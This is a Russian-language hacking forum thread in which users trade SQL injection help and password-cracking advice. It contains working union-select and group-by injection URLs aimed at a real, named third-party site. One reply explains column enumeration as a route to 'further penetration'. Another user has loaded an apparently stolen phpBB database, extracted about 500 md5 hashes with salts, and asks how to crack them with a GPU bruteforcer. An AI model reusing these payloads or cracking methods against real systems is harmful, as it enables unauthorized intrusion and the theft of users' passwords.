 |
|
13.12.2012, 13:58
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от zloy_fantom
Кто-нибудь знает, чем можно открыть файлы .MYD.MYI.frm в удобном оконном интерфейсе? Как-то неохота через командную строку работать (не зная команд mysql)
Спасибо
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
|
|
|
13.12.2012, 14:24
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Сообщение от BigBear
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
Спасибо, а можно чуть подробнее: я качаю денвер, устанавливаю его, получив локалхост, загружаю в него полученные файлы БД...
А дальше?
phpmyadmin - это примочка денвера? Как ее запустить?
|
|
|
|
13.12.2012, 14:32
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Сообщение от zloy_fantom
phpmyadmin - это примочка денвера? Как ее запустить?
Снимаю вопрос, нарыл инфу, то, что надо, спасибо, вечером поковыряю
|
|
|
|
13.12.2012, 21:00
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:
почему при зупросе http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20-- ошибка, а при http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20-- нормально все?
Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.
Заранее благодарен.
|
|
|
|
13.12.2012, 21:23
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от FunOfGun
Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:
почему при зупросе
http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20--
ошибка, а при
http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20--
нормально все?
Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.
Заранее благодарен.
1.Потому что с помощью group by мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно 25
и свыше этого числа уже будет выводиться ошибка.
Сообщение от None
http://bkp.bel-bkp.ru/site.php?id=165668-1 group by 25 --
2. спомощью union select ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,
Сообщение от None
http://bkp.bel-bkp.ru/site.php?id=165668-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25 --
3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано /thread43966.html
|
|
|
|
13.12.2012, 21:27
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Сообщение от winstrool
1.Потому что с помощью
group by
мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно
25
и свыше этого числа уже будет выводиться ошибка.
2. спомощью
union select
ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,
3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано
/thread43966.html
Спасибо за ответ, именно по этому руководству и учился. Там оказывается в пункте, посвященном group by, в объяснении первого примера ошибка.
|
|
|
|
13.12.2012, 22:22
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
С нами:
9126697
Репутация:
97
|
|
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Сообщение от None
Invalid query
SELECT r.name FROM role as r INNER JOIN admin as a ON (a.role_id = r.role_id) WHERE a.nik='
' UNION (SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=`admin` LIMIT 0,1) --
'
1054: Unknown column 'admin' in 'where clause'
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти? |
|
|
|
13.12.2012, 22:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от herfleisch
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти?
Засвети урл ошибки, посмотрим на живом примере!
|
|
|
|
14.12.2012, 03:07
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
С нами:
9126697
Репутация:
97
|
|
Сообщение от winstrool
Засвети урл ошибки, посмотрим на живом примере!
Это локальный сервер. К сожалению, нет возможности скинуть линк, ибо он получится вида http://192.168.x.x/script.php
|
|
|
|
14.12.2012, 14:45
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Сообщение от BigBear
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
Получилось, вижу пользователей, хеши в md5(phpbb3) и соль, но подозреваю, что соль могла не применяться, можно как-то по хешам определить, посолены они, или нет? И еще вопрос: не нашел сетевых ресурсов расшифровки именно md5(phpbb3)-хешей, может у кого есть на примете? Локально пока остановился на Extreme GPU Bruteforcer, у меня печ560, вроде-бы это лучшее решение, он может сразу обрабатывать файл с паролями и файл с хешами. Как теперь извлечь столбец с хешами из БД в текстовый файл? Там около пятисот значений, так что вручную не осилю.
Спасибо
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
